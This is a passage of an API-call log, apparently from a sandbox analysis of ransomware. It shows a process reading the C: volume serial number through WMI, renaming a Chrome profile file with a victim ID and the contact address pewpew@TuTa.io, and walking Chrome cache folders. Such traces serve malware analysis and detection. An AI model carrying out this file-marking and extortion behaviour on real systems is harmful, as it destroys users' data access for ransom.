ppvObject=0x949e208 | out: ppvObject=0x949e208*=0x0) returned 0x80004002 [0193.854] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x2 [0193.854] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x1 [0193.854] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0193.854] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0193.854] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x949e818*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x60277d0) returned 0x0 [0193.854] WbemLocator:IUnknown:AddRef (This=0x60277d0) returned 0x3 [0193.854] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x2 [0193.854] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x949e9ac | out: puCount=0x949e9ac*=0x2) returned 0x0 [0193.854] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=8, puBuffLength=0x949e9a8*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a8*=0xf, pszText=0x0) returned 0x0 [0193.854] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=8, puBuffLength=0x949e9a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.854] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e884 | out: ppv=0x949e884*=0x6027620) returned 0x0 [0193.854] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027620, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e918 | out: ppNamespace=0x949e918*=0x6033214) returned 0x0 [0194.553] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7b4 | out: ppvObject=0x949e7b4*=0xb5ae64) returned 0x0 [0194.553] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ae64, pProxy=0x6033214, pAuthnSvc=0x949e804, pAuthzSvc=0x949e800, pServerPrincName=0x949e7f8, pAuthnLevel=0x949e7fc, pImpLevel=0x949e7ec, pAuthInfo=0x949e7f0, pCapabilites=0x949e7f4 | out: pAuthnSvc=0x949e804*=0xa, pAuthzSvc=0x949e800*=0x0, pServerPrincName=0x949e7f8, pAuthnLevel=0x949e7fc*=0x6, pImpLevel=0x949e7ec*=0x2, pAuthInfo=0x949e7f0, pCapabilites=0x949e7f4*=0x1) returned 0x0 [0194.553] WbemLocator:IUnknown:Release (This=0xb5ae64) returned 0x1 [0194.553] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7a8 | out: ppvObject=0x949e7a8*=0xb5ae84) returned 0x0 [0194.553] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7a4 | out: ppvObject=0x949e7a4*=0xb5ae64) returned 0x0 [0194.553] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ae64, pProxy=0x6033214, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0194.554] WbemLocator:IUnknown:Release (This=0xb5ae64) returned 0x2 [0194.554] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x1 [0194.554] CoTaskMemFree (pv=0xbd4a68) [0194.554] WbemLocator:IUnknown:Release (This=0x6027620) returned 0x0 [0194.554] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3a4 | out: ppvObject=0x949e3a4*=0xb5ae84) returned 0x0 [0194.554] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e360 | out: ppvObject=0x949e360*=0x0) returned 0x80004002 [0194.911] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e17c | out: ppvObject=0x949e17c*=0x0) returned 0x80004002 [0194.911] WbemLocator:IUnknown:AddRef (This=0xb5ae84) returned 0x3 [0194.912] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dcbc | out: ppvObject=0x949dcbc*=0x0) returned 0x80004002 [0194.912] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0194.912] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc78 | out: ppvObject=0x949dc78*=0xb5ade4) returned 0x0 [0194.912] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ade4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc80 | out: pCid=0x949dc80*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0194.912] WbemLocator:IUnknown:Release (This=0xb5ade4) returned 0x3 [0194.913] CoGetContextToken (in: pToken=0x949dcd8 | out: pToken=0x949dcd8) returned 0x0 [0194.913] CoGetContextToken (in: pToken=0x949e0e0 | out: pToken=0x949e0e0) returned 0x0 [0194.913] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e170 | out: ppvObject=0x949e170*=0xb5ae6c) returned 0x0 [0194.913] WbemLocator:IRpcOptions:Query (in: This=0xb5ae6c, pPrx=0xb5ae84, dwProperty=2, pdwValue=0x949e198 | out: pdwValue=0x949e198) returned 0x80004002 [0194.913] WbemLocator:IUnknown:Release (This=0xb5ae6c) returned 0x3 [0194.913] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x2 [0194.913] CoGetContextToken (in: pToken=0x949e6b8 | out: pToken=0x949e6b8) returned 0x0 [0194.913] CoGetContextToken (in: pToken=0x949e618 | out: pToken=0x949e618) returned 0x0 [0194.913] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x949e6e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e6e4 | out: ppvObject=0x949e6e4*=0x6033214) returned 0x0 [0194.913] WbemLocator:IUnknown:AddRef (This=0x6033214) returned 0x4 [0194.913] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x3 [0194.913] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x2 [0194.913] SysStringLen (param_1=0x0) returned 0x0 [0194.913] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x949ea7c | out: puCount=0x949ea7c*=0x0) returned 0x0 [0194.913] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949ea78*=0x0, pszText=0x0 | out: puBuffLength=0x949ea78*=0x20, pszText=0x0) returned 0x0 [0194.913] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949ea78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.913] CoGetContextToken (in: pToken=0x949e6e8 | out: pToken=0x949e6e8) returned 0x0 [0194.913] WbemLocator:IUnknown:AddRef (This=0xb5ae84) returned 0x3 [0194.913] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e57c | out: ppvObject=0x949e57c*=0xb5ae84) returned 0x0 [0194.913] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x3 [0194.913] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x2 [0194.913] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949ea80*=0x0, pszText=0x0 | out: puBuffLength=0x949ea80*=0x20, pszText=0x0) returned 0x0 [0194.913] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949ea80*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea80*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.914] IWbemServices:GetObject (in: This=0x6033214, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949ea34*=0x0, ppCallResult=0x0 | out: ppObject=0x949ea34*=0x6028b10, ppCallResult=0x0) returned 0x0 [0195.238] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x949ea34 | out: puCount=0x949ea34*=0x2) returned 0x0 [0195.239] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0xf, pszText=0x0) returned 0x0 [0195.239] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x949ea30*=0xf, pszText="00000000000000" | out: puBuffLength=0x949ea30*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.239] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949ea30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x39a8610*=0, plFlavor=0x39a8614*=0 | out: pVal=0x949ea30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x39a8610*=8, plFlavor=0x39a8614*=0) returned 0x0 [0195.239] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.239] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.239] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949ea38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x39a8610*=8, plFlavor=0x39a8614*=0 | out: pVal=0x949ea38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x39a8610*=8, plFlavor=0x39a8614*=0) returned 0x0 [0195.239] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.239] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.239] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", nBufferLength=0x105, lpBuffer=0x949e638, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", lpFilePart=0x0) returned 0x5e [0195.239] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e638, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x81 [0195.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea98) returned 1 [0195.239] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), fInfoLevelId=0x0, lpFileInformation=0x949eb14 | out: lpFileInformation=0x949eb14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81c321d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81c321d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x2d22a2c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0195.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea94) returned 1 [0195.240] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0195.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0195.240] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpFilePart=0x0) returned 0x51 [0195.240] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpFilePart=0x0) returned 0x52 [0195.241] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fb10 [0195.241] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.242] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_0", cAlternateFileName="")) returned 1 [0195.242] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_1", cAlternateFileName="")) returned 1 [0195.242] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_2", cAlternateFileName="")) returned 1 [0195.242] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x402000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_3", cAlternateFileName="")) returned 1 [0195.242] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x80170, dwReserved0=0x0, dwReserved1=0x0, cFileName="index", cAlternateFileName="")) returned 1 [0195.242] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0195.242] FindClose (in: hFindFile=0xb7fb10 | out: hFindFile=0xb7fb10) returned 1 [0195.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0195.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0195.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0195.243] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpFilePart=0x0) returned 0x51 [0195.243] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpFilePart=0x0) returned 0x52 [0195.243] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fb10 [0195.243] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.243] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_0", cAlternateFileName="")) returned 1 [0195.243] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_1", cAlternateFileName="")) returned 1 [0195.243] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_2", cAlternateFileName="")) returned 1 [0195.244] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x402000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_3", cAlternateFileName="")) returned 1 [0195.244] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x80170, dwReserved0=0x0, dwReserved1=0x0, cFileName="index", cAlternateFileName="")) returned 1 [0195.244] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x80170, dwReserved0=0x0, dwReserved1=0x0, cFileName="index", cAlternateFileName="")) returned 0 [0195.244] FindClose (in: hFindFile=0xb7fb10 | out: hFindFile=0xb7fb10) returned 1 [0195.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0195.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0195.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0195.244] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpFilePart=0x0) returned 0x68 [0195.244] 